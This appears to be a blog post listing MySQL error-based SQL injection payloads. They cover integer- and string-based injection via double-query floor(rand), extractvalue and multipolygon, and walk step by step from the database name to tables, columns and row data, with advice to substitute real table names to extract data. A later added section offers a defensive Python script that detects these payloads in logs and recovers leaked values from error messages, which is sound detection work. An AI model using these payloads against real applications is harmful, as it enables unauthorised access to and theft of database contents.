Pranaam to All _/\_
This blog post is about exploiting error-based SQL injection (MySQL only). Every payload below works the same way: the injected subquery forces MySQL to raise an error whose message contains the value wrapped between 0x7e ('~') markers, so the data is read out of the error text the application echoes back.
Normal SQL Injection:
Case 1 - Integer Based
Database Name extraction
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Table name extraction
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
To extract the next table name, change the value in the LIMIT clause from 0,1 to 1,1 and so on.
Column name extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
To extract the next column name, change the value in the LIMIT clause from 0,1 to 1,1 and so on.
Data extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
In my case the column name is "user" and the table name is "data"; replace them with the appropriate column and table names so that you can extract data.
Case 1 - String Based
Database Name extraction
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
Table name extraction
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
To extract the next table name, change the value in the LIMIT clause from 0,1 to 1,1 and so on.
Column name extraction
-> ' and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
To extract the next column name, change the value in the LIMIT clause from 0,1 to 1,1 and so on.
Data extraction
-> ' and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
In my case the column name is "user" and the table name is "data"; replace them with the appropriate column and table names so that you can extract data.
Case 2 - String Based (using extractvalue function)
Database Name extraction
-> ' and extractvalue(6678,concat(0x7e,database(),0x7e)) and 1<'2
Table name extraction
-> ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2
Column name extraction
-> ' and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() LIMIT 0,1),0x7e )) and 1<'2
Data extraction
-> ' and extractvalue(6678,concat(0x7e,(select id from data LIMIT 0,1),0x7e )) and 1<'2
In my case the column name is "id" and the table name is "data"; replace them with the appropriate column and table names so that you can extract data.
Case 3 - String Based (using multipolygon function)
Database Name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,database(),0x7e))a)b))) and 1<'2
Table name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1)a)b))) and 1<'2
Column name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema=database() limit 0,1)a)b))) and 1<'2
Data extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,id,0x7e,user,0x7e) from data limit 0,1)a)b))) and 1<'2
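As an added example from the defender's side (not part of the original post), the Python below does two things a responder wants when reviewing logs from an application that was probed with the payloads above: it flags request parameters that carry any of the three techniques (double-query floor(rand(0)*2) ... GROUP BY, extractvalue/updatexml, geometry functions such as multipolygon), and it recovers the '~'-delimited value from the MySQL error text the application echoed or logged, which tells you exactly what was exposed. The error-message shapes and the sample request/error strings are assumptions modelled on typical MySQL output, not taken from the post.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Signatures of the three MySQL error-based techniques on this page, applied
# to a request parameter after URL-decoding and lower-casing it.
SIGNATURES = {
    "double-query floor(rand(0)*2) ... group by":
        re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?group\s+by", re.S),
    "xml function extractvalue/updatexml":
        re.compile(r"\b(?:extractvalue|updatexml)\s*\("),
    "geometry function multipolygon & co.":
        re.compile(r"\b(?:multipolygon|polygon|linestring|multipoint)\s*\(\s*\(?\s*select\b"),
}

def classify_param(raw_value: str) -> list:
    """Names of every technique whose signature the (decoded) parameter matches."""
    value = unquote_plus(raw_value).lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

# The payloads wrap the stolen value in 0x7e ('~') markers, so the MySQL error
# text that reached the client is a record of what left the database.
# Message shapes below are assumptions modelled on MySQL's usual wording.
LEAK_PATTERNS = [
    re.compile(r"Duplicate entry '~+(.*?)~+[01]' for key"),  # floor(rand(0)*2) GROUP BY
    re.compile(r"XPATH syntax error: '~(.*?)~'"),             # extractvalue / updatexml
    re.compile(r"Illegal non geometric .*?`~(.*?)~`"),        # multipolygon & co.
]

def extract_leaked_value(error_text: str) -> Optional[str]:
    """Return the '~'-delimited value from a logged MySQL error, or None."""
    for rx in LEAK_PATTERNS:
        m = rx.search(error_text)
        if m:
            return m.group(1)
    return None

# Constructed sample: one decoded request parameter and the database error
# the vulnerable page returned for it (both invented for this example).
SAMPLE_PARAM = ("1' and extractvalue(6678,concat(0x7e,(select table_name from "
                "information_schema.tables where table_schema=database() LIMIT 1,1),0x7e)) and 1<'2")
SAMPLE_ERROR = "XPATH syntax error: '~users~'"

if __name__ == "__main__":
    print(classify_param(SAMPLE_PARAM))        # ['xml function extractvalue/updatexml']
    print(extract_leaked_value(SAMPLE_ERROR))  # users
```

Run it over the decoded query strings in your access log and the error lines in the application log; a parameter that classifies as one of the techniques, followed by an error line from which a value can be extracted, is a confirmed disclosure rather than a mere attempt.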